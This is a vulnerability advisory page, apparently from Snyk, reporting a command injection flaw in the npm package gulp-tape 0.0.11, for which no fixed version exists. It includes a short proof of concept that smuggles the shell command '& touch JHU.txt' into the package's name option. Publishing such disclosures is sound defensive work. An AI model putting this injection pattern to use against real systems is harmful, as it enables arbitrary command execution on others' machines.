gulp-tape@0.0.11 vulnerabilities

Run Tape tests in Gulp.

Direct Vulnerabilities

Known vulnerabilities in the gulp-tape package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free
VulnerabilityVulnerable Version
  • M
Command Injection

gulp-tape is a to run Tape tests in Gulp.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands as part of gulp-tape options.

PoC

var root = require("gulp-tape");
var gulp = require("gulp");
var options = {
  name: "& touch JHU.txt"
}
gulp.src("./gulp-tape.js")
  .pipe(root(options));

How to fix Command Injection?

There is no fixed version for gulp-tape.

*